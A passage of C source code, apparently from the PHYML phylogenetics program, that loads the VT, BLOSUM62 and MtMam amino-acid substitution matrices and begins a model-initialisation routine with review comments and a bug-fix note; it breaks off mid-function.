daa[14*20+13]= 43; daa[15*20+0]= 2440; daa[15*20+1]= 385; daa[15*20+2]= 2085;
daa[15*20+3]= 590; daa[15*20+4]= 2331; daa[15*20+5]= 396; daa[15*20+6]= 568;
daa[15*20+7]= 691; daa[15*20+8]= 303; daa[15*20+9]= 216; daa[15*20+10]= 516;
daa[15*20+11]= 868; daa[15*20+12]= 93; daa[15*20+13]= 487; daa[15*20+14]= 1202;
daa[16*20+0]= 1340; daa[16*20+1]= 314; daa[16*20+2]= 1393; daa[16*20+3]= 266;
daa[16*20+4]= 576; daa[16*20+5]= 241; daa[16*20+6]= 369; daa[16*20+7]= 92;
daa[16*20+8]= 32; daa[16*20+9]= 1040; daa[16*20+10]= 156; daa[16*20+11]= 918;
daa[16*20+12]= 645; daa[16*20+13]= 148; daa[16*20+14]= 260; daa[16*20+15]= 2151;
daa[17*20+0]= 14; daa[17*20+1]= 230; daa[17*20+2]= 40; daa[17*20+3]= 18;
daa[17*20+4]= 435; daa[17*20+5]= 53; daa[17*20+6]= 63; daa[17*20+7]= 82;
daa[17*20+8]= 69; daa[17*20+9]= 42; daa[17*20+10]= 159; daa[17*20+11]= 10;
daa[17*20+12]= 86; daa[17*20+13]= 468; daa[17*20+14]= 49; daa[17*20+15]= 73;
daa[17*20+16]= 29; daa[18*20+0]= 56; daa[18*20+1]= 323; daa[18*20+2]= 754;
daa[18*20+3]= 281; daa[18*20+4]= 1466; daa[18*20+5]= 391; daa[18*20+6]= 142;
daa[18*20+7]= 10; daa[18*20+8]= 1971; daa[18*20+9]= 89; daa[18*20+10]= 189;
daa[18*20+11]= 247; daa[18*20+12]= 215; daa[18*20+13]= 2370; daa[18*20+14]= 97;
daa[18*20+15]= 522; daa[18*20+16]= 71; daa[18*20+17]= 346; daa[19*20+0]= 968;
daa[19*20+1]= 92; daa[19*20+2]= 83; daa[19*20+3]= 75; daa[19*20+4]= 592;
daa[19*20+5]= 54; daa[19*20+6]= 200; daa[19*20+7]= 91; daa[19*20+8]= 25;
daa[19*20+9]= 4797; daa[19*20+10]= 865; daa[19*20+11]= 249; daa[19*20+12]= 475;
daa[19*20+13]= 317; daa[19*20+14]= 122; daa[19*20+15]= 167; daa[19*20+16]= 760;
daa[19*20+17]= 10; daa[19*20+18]= 119;
/* mirror the lower triangle into the upper triangle: daa is symmetric */
for (i=0; i<naa; i++) for (j=0; j<i; j++) daa[j*naa+i] = daa[i*naa+j];
/* stationary (equilibrium) amino-acid frequencies */
pi[0]= 0.076; pi[1]= 0.062; pi[2]= 0.041; pi[3]= 0.037;
pi[4]= 0.009; pi[5]= 0.038; pi[6]= 0.049; pi[7]= 0.084;
pi[8]= 0.025; pi[9]= 0.081; pi[10]= 0.101; pi[11]= 0.05;
pi[12]= 0.022; pi[13]= 0.051; pi[14]= 0.043; pi[15]= 0.062;
pi[16]= 0.054; pi[17]= 0.018; pi[18]= 0.031; pi[19]= 0.066;
return 1;
}
/*********************************************************/
/*
 * Init_Qmat_VT
 *
 * Loads the VT (Vingron-Muller) empirical amino-acid replacement model:
 * exchangeabilities into daa and stationary frequencies into pi.
 *
 * daa : out; 20x20 row-major matrix. Only the strictly lower triangle is
 *       written, then mirrored into the upper triangle (symmetric matrix).
 * pi  : out; 20 equilibrium amino-acid frequencies.
 *
 * NOTE(review): amino-acid index order presumably follows the PAML/PHYML
 * convention (A R N D C Q E G H I L K M F P S T W Y V) — confirm against
 * the caller.
 *
 * Always returns 1.
 */
int Init_Qmat_VT(double *daa, double *pi)
{
/*
This model has been 'translated' from John Huelsenbeck and Fredrik Ronquist
MrBayes program into PHYML format by Federico Abascal. Many thanks to them.
*/
/*
Muller, T., and M. Vingron. 2000. Modeling amino acid replacement.
Journal of Computational Biology 7:761-776.
*/
int i,j,naa;
naa = 20;
/* lower triangle of the symmetric exchangeability matrix */
daa[1*20+0]= 0.233108; daa[2*20+0]= 0.199097; daa[2*20+1]= 0.210797; daa[3*20+0]= 0.265145;
daa[3*20+1]= 0.105191; daa[3*20+2]= 0.883422; daa[4*20+0]= 0.227333; daa[4*20+1]= 0.031726;
daa[4*20+2]= 0.027495; daa[4*20+3]= 0.010313; daa[5*20+0]= 0.310084; daa[5*20+1]= 0.493763;
daa[5*20+2]= 0.2757; daa[5*20+3]= 0.205842; daa[5*20+4]= 0.004315; daa[6*20+0]= 0.567957;
daa[6*20+1]= 0.25524; daa[6*20+2]= 0.270417; daa[6*20+3]= 1.599461; daa[6*20+4]= 0.005321;
daa[6*20+5]= 0.960976; daa[7*20+0]= 0.876213; daa[7*20+1]= 0.156945; daa[7*20+2]= 0.362028;
daa[7*20+3]= 0.311718; daa[7*20+4]= 0.050876; daa[7*20+5]= 0.12866; daa[7*20+6]= 0.250447;
daa[8*20+0]= 0.078692; daa[8*20+1]= 0.213164; daa[8*20+2]= 0.290006; daa[8*20+3]= 0.134252;
daa[8*20+4]= 0.016695; daa[8*20+5]= 0.315521; daa[8*20+6]= 0.104458; daa[8*20+7]= 0.058131;
daa[9*20+0]= 0.222972; daa[9*20+1]= 0.08151; daa[9*20+2]= 0.087225; daa[9*20+3]= 0.01172;
daa[9*20+4]= 0.046398; daa[9*20+5]= 0.054602; daa[9*20+6]= 0.046589; daa[9*20+7]= 0.051089;
daa[9*20+8]= 0.020039; daa[10*20+0]= 0.42463; daa[10*20+1]= 0.192364; daa[10*20+2]= 0.069245;
daa[10*20+3]= 0.060863; daa[10*20+4]= 0.091709; daa[10*20+5]= 0.24353; daa[10*20+6]= 0.151924;
daa[10*20+7]= 0.087056; daa[10*20+8]= 0.103552; daa[10*20+9]= 2.08989; daa[11*20+0]= 0.393245;
daa[11*20+1]= 1.755838; daa[11*20+2]= 0.50306; daa[11*20+3]= 0.261101; daa[11*20+4]= 0.004067;
daa[11*20+5]= 0.738208; daa[11*20+6]= 0.88863; daa[11*20+7]= 0.193243; daa[11*20+8]= 0.153323;
daa[11*20+9]= 0.093181; daa[11*20+10]= 0.201204; daa[12*20+0]= 0.21155; daa[12*20+1]= 0.08793;
daa[12*20+2]= 0.05742; daa[12*20+3]= 0.012182; daa[12*20+4]= 0.02369; daa[12*20+5]= 0.120801;
daa[12*20+6]= 0.058643; daa[12*20+7]= 0.04656; daa[12*20+8]= 0.021157; daa[12*20+9]= 0.493845;
daa[12*20+10]= 1.105667; daa[12*20+11]= 0.096474; daa[13*20+0]= 0.116646; daa[13*20+1]= 0.042569;
daa[13*20+2]= 0.039769; daa[13*20+3]= 0.016577; daa[13*20+4]= 0.051127; daa[13*20+5]= 0.026235;
daa[13*20+6]= 0.028168; daa[13*20+7]= 0.050143; daa[13*20+8]= 0.079807; daa[13*20+9]= 0.32102;
daa[13*20+10]= 0.946499; daa[13*20+11]= 0.038261; daa[13*20+12]= 0.173052; daa[14*20+0]= 0.399143;
daa[14*20+1]= 0.12848; daa[14*20+2]= 0.083956; daa[14*20+3]= 0.160063; daa[14*20+4]= 0.011137;
daa[14*20+5]= 0.15657; daa[14*20+6]= 0.205134; daa[14*20+7]= 0.124492; daa[14*20+8]= 0.078892;
daa[14*20+9]= 0.054797; daa[14*20+10]= 0.169784; daa[14*20+11]= 0.212302; daa[14*20+12]= 0.010363;
daa[14*20+13]= 0.042564; daa[15*20+0]= 1.817198; daa[15*20+1]= 0.292327; daa[15*20+2]= 0.847049;
daa[15*20+3]= 0.461519; daa[15*20+4]= 0.17527; daa[15*20+5]= 0.358017; daa[15*20+6]= 0.406035;
daa[15*20+7]= 0.612843; daa[15*20+8]= 0.167406; daa[15*20+9]= 0.081567; daa[15*20+10]= 0.214977;
daa[15*20+11]= 0.400072; daa[15*20+12]= 0.090515; daa[15*20+13]= 0.138119; daa[15*20+14]= 0.430431;
daa[16*20+0]= 0.877877; daa[16*20+1]= 0.204109; daa[16*20+2]= 0.471268; daa[16*20+3]= 0.178197;
daa[16*20+4]= 0.079511; daa[16*20+5]= 0.248992; daa[16*20+6]= 0.321028; daa[16*20+7]= 0.136266;
daa[16*20+8]= 0.101117; daa[16*20+9]= 0.376588; daa[16*20+10]= 0.243227; daa[16*20+11]= 0.446646;
daa[16*20+12]= 0.184609; daa[16*20+13]= 0.08587; daa[16*20+14]= 0.207143; daa[16*20+15]= 1.767766;
daa[17*20+0]= 0.030309; daa[17*20+1]= 0.046417; daa[17*20+2]= 0.010459; daa[17*20+3]= 0.011393;
daa[17*20+4]= 0.007732; daa[17*20+5]= 0.021248; daa[17*20+6]= 0.018844; daa[17*20+7]= 0.02399;
daa[17*20+8]= 0.020009; daa[17*20+9]= 0.034954; daa[17*20+10]= 0.083439; daa[17*20+11]= 0.023321;
daa[17*20+12]= 0.022019; daa[17*20+13]= 0.12805; daa[17*20+14]= 0.014584; daa[17*20+15]= 0.035933;
daa[17*20+16]= 0.020437; daa[18*20+0]= 0.087061; daa[18*20+1]= 0.09701; daa[18*20+2]= 0.093268;
daa[18*20+3]= 0.051664; daa[18*20+4]= 0.042823; daa[18*20+5]= 0.062544; daa[18*20+6]= 0.0552;
daa[18*20+7]= 0.037568; daa[18*20+8]= 0.286027; daa[18*20+9]= 0.086237; daa[18*20+10]= 0.189842;
daa[18*20+11]= 0.068689; daa[18*20+12]= 0.073223; daa[18*20+13]= 0.898663; daa[18*20+14]= 0.032043;
daa[18*20+15]= 0.121979; daa[18*20+16]= 0.094617; daa[18*20+17]= 0.124746; daa[19*20+0]= 1.230985;
daa[19*20+1]= 0.113146; daa[19*20+2]= 0.049824; daa[19*20+3]= 0.048769; daa[19*20+4]= 0.163831;
daa[19*20+5]= 0.112027; daa[19*20+6]= 0.205868; daa[19*20+7]= 0.082579; daa[19*20+8]= 0.068575;
daa[19*20+9]= 3.65443; daa[19*20+10]= 1.337571; daa[19*20+11]= 0.144587; daa[19*20+12]= 0.307309;
daa[19*20+13]= 0.247329; daa[19*20+14]= 0.129315; daa[19*20+15]= 0.1277; daa[19*20+16]= 0.740372;
daa[19*20+17]= 0.022134; daa[19*20+18]= 0.125733;
/* mirror the lower triangle into the upper triangle: daa is symmetric */
for (i=0; i<naa; i++) for (j=0; j<i; j++) daa[j*naa+i] = daa[i*naa+j];
/* stationary (equilibrium) amino-acid frequencies */
pi[0]= 0.078837; pi[1]= 0.051238; pi[2]= 0.042313; pi[3]= 0.053066;
pi[4]= 0.015175; pi[5]= 0.036713; pi[6]= 0.061924; pi[7]= 0.070852;
pi[8]= 0.023082; pi[9]= 0.062056; pi[10]= 0.096371; pi[11]= 0.057324;
pi[12]= 0.023771; pi[13]= 0.043296; pi[14]= 0.043911; pi[15]= 0.063403;
pi[16]= 0.055897; pi[17]= 0.013272; pi[18]= 0.034399; pi[19]= 0.073101;
return 1;
}
/*********************************************************/
/*
 * Init_Qmat_Blosum62
 *
 * Loads the BLOSUM62-derived amino-acid replacement model:
 * exchangeabilities into daa and stationary frequencies into pi.
 *
 * daa : out; 20x20 row-major matrix. Only the strictly lower triangle is
 *       written, then mirrored into the upper triangle (symmetric matrix).
 * pi  : out; 20 equilibrium amino-acid frequencies.
 *
 * NOTE(review): amino-acid index order presumably follows the PAML/PHYML
 * convention (A R N D C Q E G H I L K M F P S T W Y V) — confirm against
 * the caller.
 *
 * Always returns 1.
 */
int Init_Qmat_Blosum62 (double *daa, double *pi)
{
/*
This model has been 'translated' from John Huelsenbeck and Fredrik Ronquist
MrBayes program into PHYML format by Federico Abascal. Many thanks to them.
*/
/*
Henikoff, S., and J. G. Henikoff. 1992. Amino acid substitution
matrices from protein blocks. Proc. Natl. Acad. Sci., U.S.A.
89:10915-10919.
*/
int i,j,naa;
naa = 20;
/* lower triangle of the symmetric exchangeability matrix */
daa[1*20+0]= 0.735790389698; daa[2*20+0]= 0.485391055466; daa[2*20+1]= 1.297446705134; daa[3*20+0]= 0.543161820899;
daa[3*20+1]= 0.500964408555; daa[3*20+2]= 3.180100048216; daa[4*20+0]= 1.45999531047; daa[4*20+1]= 0.227826574209;
daa[4*20+2]= 0.397358949897; daa[4*20+3]= 0.240836614802; daa[5*20+0]= 1.199705704602; daa[5*20+1]= 3.020833610064;
daa[5*20+2]= 1.839216146992; daa[5*20+3]= 1.190945703396; daa[5*20+4]= 0.32980150463; daa[6*20+0]= 1.1709490428;
daa[6*20+1]= 1.36057419042; daa[6*20+2]= 1.24048850864; daa[6*20+3]= 3.761625208368; daa[6*20+4]= 0.140748891814;
daa[6*20+5]= 5.528919177928; daa[7*20+0]= 1.95588357496; daa[7*20+1]= 0.418763308518; daa[7*20+2]= 1.355872344485;
daa[7*20+3]= 0.798473248968; daa[7*20+4]= 0.418203192284; daa[7*20+5]= 0.609846305383; daa[7*20+6]= 0.423579992176;
daa[8*20+0]= 0.716241444998; daa[8*20+1]= 1.456141166336; daa[8*20+2]= 2.414501434208; daa[8*20+3]= 0.778142664022;
daa[8*20+4]= 0.354058109831; daa[8*20+5]= 2.43534113114; daa[8*20+6]= 1.626891056982; daa[8*20+7]= 0.539859124954;
daa[9*20+0]= 0.605899003687; daa[9*20+1]= 0.232036445142; daa[9*20+2]= 0.283017326278; daa[9*20+3]= 0.418555732462;
daa[9*20+4]= 0.774894022794; daa[9*20+5]= 0.236202451204; daa[9*20+6]= 0.186848046932; daa[9*20+7]= 0.189296292376;
daa[9*20+8]= 0.252718447885; daa[10*20+0]= 0.800016530518; daa[10*20+1]= 0.622711669692; daa[10*20+2]= 0.211888159615;
daa[10*20+3]= 0.218131577594; daa[10*20+4]= 0.831842640142; daa[10*20+5]= 0.580737093181; daa[10*20+6]= 0.372625175087;
daa[10*20+7]= 0.217721159236; daa[10*20+8]= 0.348072209797; daa[10*20+9]= 3.890963773304; daa[11*20+0]= 1.295201266783;
daa[11*20+1]= 5.411115141489; daa[11*20+2]= 1.593137043457; daa[11*20+3]= 1.032447924952; daa[11*20+4]= 0.285078800906;
daa[11*20+5]= 3.945277674515; daa[11*20+6]= 2.802427151679; daa[11*20+7]= 0.752042440303; daa[11*20+8]= 1.022507035889;
daa[11*20+9]= 0.406193586642; daa[11*20+10]= 0.445570274261;daa[12*20+0]= 1.253758266664; daa[12*20+1]= 0.983692987457;
daa[12*20+2]= 0.648441278787; daa[12*20+3]= 0.222621897958; daa[12*20+4]= 0.76768882348; daa[12*20+5]= 2.494896077113;
daa[12*20+6]= 0.55541539747; daa[12*20+7]= 0.459436173579; daa[12*20+8]= 0.984311525359; daa[12*20+9]= 3.364797763104;
daa[12*20+10]= 6.030559379572;daa[12*20+11]= 1.073061184332;daa[13*20+0]= 0.492964679748; daa[13*20+1]= 0.371644693209;
daa[13*20+2]= 0.354861249223; daa[13*20+3]= 0.281730694207; daa[13*20+4]= 0.441337471187; daa[13*20+5]= 0.14435695975;
daa[13*20+6]= 0.291409084165; daa[13*20+7]= 0.368166464453; daa[13*20+8]= 0.714533703928; daa[13*20+9]= 1.517359325954;
daa[13*20+10]= 2.064839703237;daa[13*20+11]= 0.266924750511;daa[13*20+12]= 1.77385516883; daa[14*20+0]= 1.173275900924;
daa[14*20+1]= 0.448133661718; daa[14*20+2]= 0.494887043702; daa[14*20+3]= 0.730628272998; daa[14*20+4]= 0.356008498769;
daa[14*20+5]= 0.858570575674; daa[14*20+6]= 0.926563934846; daa[14*20+7]= 0.504086599527; daa[14*20+8]= 0.527007339151;
daa[14*20+9]= 0.388355409206; daa[14*20+10]= 0.374555687471;daa[14*20+11]= 1.047383450722;daa[14*20+12]= 0.454123625103;
daa[14*20+13]= 0.233597909629;daa[15*20+0]= 4.325092687057; daa[15*20+1]= 1.12278310421; daa[15*20+2]= 2.904101656456;
daa[15*20+3]= 1.582754142065; daa[15*20+4]= 1.197188415094; daa[15*20+5]= 1.934870924596; daa[15*20+6]= 1.769893238937;
daa[15*20+7]= 1.509326253224; daa[15*20+8]= 1.11702976291; daa[15*20+9]= 0.35754441246; daa[15*20+10]= 0.352969184527;
daa[15*20+11]= 1.752165917819;daa[15*20+12]= 0.918723415746;daa[15*20+13]= 0.540027644824;daa[15*20+14]= 1.169129577716;
daa[16*20+0]= 1.729178019485; daa[16*20+1]= 0.914665954563; daa[16*20+2]= 1.898173634533; daa[16*20+3]= 0.934187509431;
daa[16*20+4]= 1.119831358516; daa[16*20+5]= 1.277480294596; daa[16*20+6]= 1.071097236007; daa[16*20+7]= 0.641436011405;
daa[16*20+8]= 0.585407090225; daa[16*20+9]= 1.17909119726; daa[16*20+10]= 0.915259857694;daa[16*20+11]= 1.303875200799;
daa[16*20+12]= 1.488548053722;daa[16*20+13]= 0.488206118793;daa[16*20+14]= 1.005451683149;daa[16*20+15]= 5.15155629227;
daa[17*20+0]= 0.465839367725; daa[17*20+1]= 0.426382310122; daa[17*20+2]= 0.191482046247; daa[17*20+3]= 0.145345046279;
daa[17*20+4]= 0.527664418872; daa[17*20+5]= 0.758653808642; daa[17*20+6]= 0.407635648938; daa[17*20+7]= 0.508358924638;
daa[17*20+8]= 0.30124860078; daa[17*20+9]= 0.34198578754; daa[17*20+10]= 0.6914746346; daa[17*20+11]= 0.332243040634;
daa[17*20+12]= 0.888101098152;daa[17*20+13]= 2.074324893497;daa[17*20+14]= 0.252214830027;daa[17*20+15]= 0.387925622098;
daa[17*20+16]= 0.513128126891;daa[18*20+0]= 0.718206697586; daa[18*20+1]= 0.720517441216; daa[18*20+2]= 0.538222519037;
daa[18*20+3]= 0.261422208965; daa[18*20+4]= 0.470237733696; daa[18*20+5]= 0.95898974285; daa[18*20+6]= 0.596719300346;
daa[18*20+7]= 0.308055737035; daa[18*20+8]= 4.218953969389; daa[18*20+9]= 0.674617093228; daa[18*20+10]= 0.811245856323;
daa[18*20+11]= 0.7179934869; daa[18*20+12]= 0.951682162246;daa[18*20+13]= 6.747260430801;daa[18*20+14]= 0.369405319355;
daa[18*20+15]= 0.796751520761;daa[18*20+16]= 0.801010243199;daa[18*20+17]= 4.054419006558;daa[19*20+0]= 2.187774522005;
daa[19*20+1]= 0.438388343772; daa[19*20+2]= 0.312858797993; daa[19*20+3]= 0.258129289418; daa[19*20+4]= 1.116352478606;
daa[19*20+5]= 0.530785790125; daa[19*20+6]= 0.524253846338; daa[19*20+7]= 0.25334079019; daa[19*20+8]= 0.20155597175;
daa[19*20+9]= 8.311839405458; daa[19*20+10]= 2.231405688913;daa[19*20+11]= 0.498138475304;daa[19*20+12]= 2.575850755315;
daa[19*20+13]= 0.838119610178;daa[19*20+14]= 0.496908410676;daa[19*20+15]= 0.561925457442;daa[19*20+16]= 2.253074051176;
daa[19*20+17]= 0.266508731426;daa[19*20+18]= 1;
/* mirror the lower triangle into the upper triangle: daa is symmetric */
for (i=0; i<naa; i++) for (j=0; j<i; j++) daa[j*naa+i] = daa[i*naa+j];
/* stationary (equilibrium) amino-acid frequencies */
pi[0]= 0.074; pi[1]= 0.052; pi[2]= 0.045; pi[3]= 0.054;
pi[4]= 0.025; pi[5]= 0.034; pi[6]= 0.054; pi[7]= 0.074;
pi[8]= 0.026; pi[9]= 0.068; pi[10]= 0.099; pi[11]= 0.058;
pi[12]= 0.025; pi[13]= 0.047; pi[14]= 0.039; pi[15]= 0.057;
pi[16]= 0.051; pi[17]= 0.013; pi[18]= 0.032; pi[19]= 0.073;
return 1;
}
/*********************************************************/
/*
 * Init_Qmat_MtMam
 *
 * Loads the MtMam empirical amino-acid replacement model (estimated from
 * mammalian mitochondrial proteins): exchangeabilities into daa and
 * stationary frequencies into pi. Many exchangeabilities are exactly 0,
 * i.e. those substitutions were unobserved in the source data.
 *
 * daa : out; 20x20 row-major matrix. Only the strictly lower triangle is
 *       written, then mirrored into the upper triangle (symmetric matrix).
 * pi  : out; 20 equilibrium amino-acid frequencies.
 *
 * NOTE(review): amino-acid index order presumably follows the PAML/PHYML
 * convention (A R N D C Q E G H I L K M F P S T W Y V) — confirm against
 * the caller.
 *
 * Always returns 1.
 */
int Init_Qmat_MtMam(double *daa, double *pi)
{
/*
This model has been 'translated' from Ziheng Yang's PAML program
into PHYML format by Federico Abascal. Many thanks to them.
*/
/*
Cao, Y. et al. 1998 Conflict amongst individual mitochondrial
proteins in resolving the phylogeny of eutherian orders. Journal
of Molecular Evolution 15:1600-1611.
*/
int i,j,naa;
naa = 20;
/* lower triangle of the symmetric exchangeability matrix */
daa[1*20+0]= 32; daa[2*20+0]= 2; daa[2*20+1]= 4; daa[3*20+0]= 11;
daa[3*20+1]= 0; daa[3*20+2]= 864; daa[4*20+0]= 0; daa[4*20+1]= 186;
daa[4*20+2]= 0; daa[4*20+3]= 0; daa[5*20+0]= 0; daa[5*20+1]= 246;
daa[5*20+2]= 8; daa[5*20+3]= 49; daa[5*20+4]= 0; daa[6*20+0]= 0;
daa[6*20+1]= 0; daa[6*20+2]= 0; daa[6*20+3]= 569; daa[6*20+4]= 0;
daa[6*20+5]= 274; daa[7*20+0]= 78; daa[7*20+1]= 18; daa[7*20+2]= 47;
daa[7*20+3]= 79; daa[7*20+4]= 0; daa[7*20+5]= 0; daa[7*20+6]= 22;
daa[8*20+0]= 8; daa[8*20+1]= 232; daa[8*20+2]= 458; daa[8*20+3]= 11;
daa[8*20+4]= 305; daa[8*20+5]= 550; daa[8*20+6]= 22; daa[8*20+7]= 0;
daa[9*20+0]= 75; daa[9*20+1]= 0; daa[9*20+2]= 19; daa[9*20+3]= 0;
daa[9*20+4]= 41; daa[9*20+5]= 0; daa[9*20+6]= 0; daa[9*20+7]= 0;
daa[9*20+8]= 0; daa[10*20+0]= 21; daa[10*20+1]= 6; daa[10*20+2]= 0;
daa[10*20+3]= 0; daa[10*20+4]= 27; daa[10*20+5]= 20; daa[10*20+6]= 0;
daa[10*20+7]= 0; daa[10*20+8]= 26; daa[10*20+9]= 232; daa[11*20+0]= 0;
daa[11*20+1]= 50; daa[11*20+2]= 408; daa[11*20+3]= 0; daa[11*20+4]= 0;
daa[11*20+5]= 242; daa[11*20+6]= 215; daa[11*20+7]= 0; daa[11*20+8]= 0;
daa[11*20+9]= 6; daa[11*20+10]= 4; daa[12*20+0]= 76; daa[12*20+1]= 0;
daa[12*20+2]= 21; daa[12*20+3]= 0; daa[12*20+4]= 0; daa[12*20+5]= 22;
daa[12*20+6]= 0; daa[12*20+7]= 0; daa[12*20+8]= 0; daa[12*20+9]= 378;
daa[12*20+10]= 609; daa[12*20+11]= 59; daa[13*20+0]= 0; daa[13*20+1]= 0;
daa[13*20+2]= 6; daa[13*20+3]= 5; daa[13*20+4]= 7; daa[13*20+5]= 0;
daa[13*20+6]= 0; daa[13*20+7]= 0; daa[13*20+8]= 0; daa[13*20+9]= 57;
daa[13*20+10]= 246; daa[13*20+11]= 0; daa[13*20+12]= 11; daa[14*20+0]= 53;
daa[14*20+1]= 9; daa[14*20+2]= 33; daa[14*20+3]= 2; daa[14*20+4]= 0;
daa[14*20+5]= 51; daa[14*20+6]= 0; daa[14*20+7]= 0; daa[14*20+8]= 53;
daa[14*20+9]= 5; daa[14*20+10]= 43; daa[14*20+11]= 18; daa[14*20+12]= 0;
daa[14*20+13]= 17; daa[15*20+0]= 342; daa[15*20+1]= 3; daa[15*20+2]= 446;
daa[15*20+3]= 16; daa[15*20+4]= 347; daa[15*20+5]= 30; daa[15*20+6]= 21;
daa[15*20+7]= 112; daa[15*20+8]= 20; daa[15*20+9]= 0; daa[15*20+10]= 74;
daa[15*20+11]= 65; daa[15*20+12]= 47; daa[15*20+13]= 90; daa[15*20+14]= 202;
daa[16*20+0]= 681; daa[16*20+1]= 0; daa[16*20+2]= 110; daa[16*20+3]= 0;
daa[16*20+4]= 114; daa[16*20+5]= 0; daa[16*20+6]= 4; daa[16*20+7]= 0;
daa[16*20+8]= 1; daa[16*20+9]= 360; daa[16*20+10]= 34; daa[16*20+11]= 50;
daa[16*20+12]= 691; daa[16*20+13]= 8; daa[16*20+14]= 78; daa[16*20+15]= 614;
daa[17*20+0]= 5; daa[17*20+1]= 16; daa[17*20+2]= 6; daa[17*20+3]= 0;
daa[17*20+4]= 65; daa[17*20+5]= 0; daa[17*20+6]= 0; daa[17*20+7]= 0;
daa[17*20+8]= 0; daa[17*20+9]= 0; daa[17*20+10]= 12; daa[17*20+11]= 0;
daa[17*20+12]= 13; daa[17*20+13]= 0; daa[17*20+14]= 7; daa[17*20+15]= 17;
daa[17*20+16]= 0; daa[18*20+0]= 0; daa[18*20+1]= 0; daa[18*20+2]= 156;
daa[18*20+3]= 0; daa[18*20+4]= 530; daa[18*20+5]= 54; daa[18*20+6]= 0;
daa[18*20+7]= 1; daa[18*20+8]= 1525;daa[18*20+9]= 16; daa[18*20+10]= 25;
daa[18*20+11]= 67; daa[18*20+12]= 0; daa[18*20+13]= 682; daa[18*20+14]= 8;
daa[18*20+15]= 107; daa[18*20+16]= 0; daa[18*20+17]= 14; daa[19*20+0]= 398;
daa[19*20+1]= 0; daa[19*20+2]= 0; daa[19*20+3]= 10; daa[19*20+4]= 0;
daa[19*20+5]= 33; daa[19*20+6]= 20; daa[19*20+7]= 5; daa[19*20+8]= 0;
daa[19*20+9]= 2220; daa[19*20+10]= 100;daa[19*20+11]= 0; daa[19*20+12]= 832;
daa[19*20+13]= 6; daa[19*20+14]= 0; daa[19*20+15]= 0; daa[19*20+16]= 237;
daa[19*20+17]= 0; daa[19*20+18]= 0;
/* mirror the lower triangle into the upper triangle: daa is symmetric */
for (i=0; i<naa; i++) for (j=0; j<i; j++) daa[j*naa+i] = daa[i*naa+j];
/* stationary (equilibrium) amino-acid frequencies */
pi[0]= 0.0692; pi[1]= 0.0184; pi[2]= 0.04; pi[3]= 0.0186;
pi[4]= 0.0065; pi[5]= 0.0238; pi[6]= 0.0236; pi[7]= 0.0557;
pi[8]= 0.0277; pi[9]= 0.0905; pi[10]=0.1675; pi[11]= 0.0221;
pi[12]=0.0561; pi[13]= 0.0611; pi[14]=0.0536; pi[15]= 0.0725;
pi[16]=0.087; pi[17]= 0.0293; pi[18]=0.034; pi[19]= 0.0428;
return 1;
}
/*********************************************************/
/*
 * Init_Model: initialise the substitution model before likelihood
 * computation.
 *
 * data : the alignment (observed base frequencies, crunched length).
 *        NOTE(review): 'data' is NULL-checked only for seq_len but
 *        dereferenced unconditionally below — callers presumably always
 *        pass a valid alignment; confirm.
 * mod  : the model structure filled in place (pi, Q matrix, eigen system).
 *
 * BUGFIX: the eigen-decomposition result was previously discarded
 * ('result = 0; if (result == eigen(...))'), which made the error
 * branch below unreachable — neither the non-convergence nor the
 * complex-eigenvalue diagnostic could ever print. The return value is
 * now captured and tested (eigen: 0 = ok, -1 = no convergence,
 * 1 = complex eigenvalues, per the PAML convention).
 */
void Init_Model(allseq *data, model *mod)
{
  int i,j;
  int ns;
  double sum,aux;
  int result;
  double *dr, *di, *space;

  if(data) mod->seq_len = data->init_len;

  /* Start from a single uniform rate class. */
  For(i,mod->n_catg)
    {
      mod->rr[i] = 1.0;
      mod->r_proba[i] = 1.0;
    }

  if(!mod->invar) For(i,data->crunch_len) data->invar[i] = 0;

  ns = mod->ns;

  /* datatype: 1 = amino acids (model numbers 11..20), 0 otherwise
     (nucleotides and codon models). */
  mod->datatype = (mod->whichmodel>=10)?((mod->whichmodel>20)?(0):(1)):(0);

  /* Scratch buffers for the eigen decomposition. */
  dr = (double *)mCalloc( ns,sizeof(double));
  di = (double *)mCalloc( ns,sizeof(double));
  space = (double *)mCalloc(2*ns,sizeof(double));

  /* Default equilibrium frequencies: observed frequencies in the data. */
  For(i,ns)
    mod->pi[i] = data->b_frq[i];

  if(!mod->datatype) /* Nucleotides */
    {
      if(mod->whichmodel < 40)
	{
	  /* init for nucleotides */
	  mod->lambda = 1.;

	  /* Models 1 and 2: equal base frequencies. */
	  if((mod->whichmodel==1) || (mod->whichmodel==2))
	    {
	      mod->pi[0] = mod->pi[1] = mod->pi[2] = mod->pi[3] = .25;
	    }

	  /* Models with no transition/transversion ratio parameter. */
	  if((mod->whichmodel==1) || (mod->whichmodel==3) || (mod->whichmodel==7) || (mod->whichmodel==8))
	    {
	      mod->kappa = 1.;
	    }

	  /* TN93-style model: derive lambda from kappa and frequencies. */
	  if(mod->whichmodel == 5)
	    {
	      aux = ((mod->pi[0]+mod->pi[2])-(mod->pi[1]+mod->pi[3]))/(2.*mod->kappa);
	      mod->lambda = ((mod->pi[1]+mod->pi[3]) + aux)/((mod->pi[0]+mod->pi[2]) - aux);
	    }

	  /* Custom model: all six relative rates distinct (GTR). */
	  if(mod->whichmodel == 7)
	    {
	      mod->custom_mod_string[0] = '0';
	      mod->custom_mod_string[1] = '1';
	      mod->custom_mod_string[2] = '2';
	      mod->custom_mod_string[3] = '3';
	      mod->custom_mod_string[4] = '4';
	      mod->custom_mod_string[5] = '5';
	      Translate_Custom_Mod_String(mod);
	      Update_Qmat_GTR(mod);
	    }

	  /* GTR: honour user-supplied base frequencies when given. */
	  if(mod->whichmodel == 8)
	    {
	      if(mod->user_b_freq[0] > -1.)
		{
		  For(i,4)
		    {
		      mod->pi[i] = mod->user_b_freq[i];
		    }
		}
	      Update_Qmat_GTR(mod);
	    }
	}
      else
	{
	  /* init for codon model: uniform over the 61 sense codons. */
	  For(i,64) mod->pi[i] = 1./61;
	}
    }
  else
    { /* init for amino-acids */
      /* see comments of PMat_Empirical for details */
      /* read pi and Q from file */
      switch(mod->whichmodel)
	{
	case 11 :
	  {
	    Init_Qmat_Dayhoff(mod->mat_Q,mod->pi);
	    break;
	  }
	case 12 :
	  {
	    Init_Qmat_JTT(mod->mat_Q,mod->pi);
	    break;
	  }
	case 13 :
	  {
	    Init_Qmat_MtREV(mod->mat_Q,mod->pi);
	    break;
	  }
	case 14 :
	  {
	    Init_Qmat_WAG(mod->mat_Q,mod->pi);
	    break;
	  }
	case 15 :
	  {
	    Init_Qmat_DCMut(mod->mat_Q,mod->pi);
	    break;
	  }
	case 16 :
	  {
